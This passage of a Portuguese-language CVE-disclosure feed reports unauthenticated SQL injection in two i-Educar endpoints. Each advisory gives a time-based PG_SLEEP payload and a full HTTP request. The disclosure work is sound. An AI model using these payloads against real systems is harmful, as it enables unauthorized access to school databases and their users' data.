&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/module/AreaConhecimento/view&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;exemplo-de-requisição&amp;#34;&amp;gt;Exemplo de Requisição
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/AreaConhecimento/view?id=3&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/module/AreaConhecimento/index
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: [COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9685/image.png&amp;#34;
	width=&amp;#34;1121&amp;#34;
	height=&amp;#34;1008&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9685/image_hu_9ce46d5757c7b26c.png 480w, /p/cve-2025-9685/image_hu_eb5dd3ebbb1178d3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;111&amp;#34;
		data-flex-basis=&amp;#34;266px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9685.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9685.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 30 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9686</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9686/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9686/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9686-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleareaconhecimentoedit&amp;#34;&amp;gt;CVE-2025-9686: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/module/AreaConhecimento/edit&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9686&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9686&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/module/AreaConhecimento/edit&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9686-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleareaconhecimentoedit&amp;#34;&amp;gt;CVE-2025-9686: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/module/AreaConhecimento/edit&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9686&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9686&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/module/AreaConhecimento/edit&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/module/AreaConhecimento/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;exemplo-de-requisição&amp;#34;&amp;gt;Exemplo de Requisição
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /module/AreaConhecimento/edit?id=3&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 90
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Origin: http://localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/module/AreaConhecimento/edit?id=3
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: grav-admin-flexpages=eyJyb3V0ZSI6Ii9ob21lIiwiZmlsdGVycyI6e319; grav-tabs-state={%22tab--f0e041eed24f87f2b6b02fd6924d0a08%22:%22data.languages%22%2C%22tab-flex-pages-e838602f51515c83bca06a8ae758ce52%22:%22data.security%22%2C%22tab-flex-pages-b6676b27f5cdf6b6c22f8e18da4259a0%22:%22data.advanced%22%2C%22tab-flex-pages-raw-8f0a83a672754f7823714134334b1de8%22:%22data.content%22%2C%22tab-flex-pages-dc26c564cb2116d77bda5fff24ba90dc%22:%22data.security%22%2C%22tab-flex_conf-user_groups-accounts-02f0e9f68f41a0648ed530f80bd72c06%22:%22data.cache%22%2C%22tab-flex-pages-raw-9a0364b9e99bb480dd25e1f0284c8555%22:%22data.content%22%2C%22tab-flex-pages-e91e6348157868de9dd8b25c81aebfb9%22:%22data.security%22%2C%22tab--8cc45760590da203c5fc3568ecbabd66%22:%22data.routes%22%2C%22tab--7a2ac3477f8ad14aa750831441325a16%22:%22data.facebook%22}; i_educar_session=iIw1P9Yxwm9hsXZb74mgDwRm5ltCSdmSQuuURvmG
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;tipoacao=Editar&amp;amp;amp;id=3&amp;amp;amp;instituicao=1&amp;amp;amp;nome=Educa%C3%A7%C3%A3o&#43;Infantil&amp;amp;amp;secao=&amp;amp;amp;ordenamento_ac=
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9686/image.png&amp;#34;
	width=&amp;#34;1123&amp;#34;
	height=&amp;#34;1015&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9686/image_hu_5fdd05e927141c54.png 480w, /p/cve-2025-9686/image_hu_66ab9f29ad1e9d8.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;110&amp;#34;
		data-flex-basis=&amp;#34;265px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
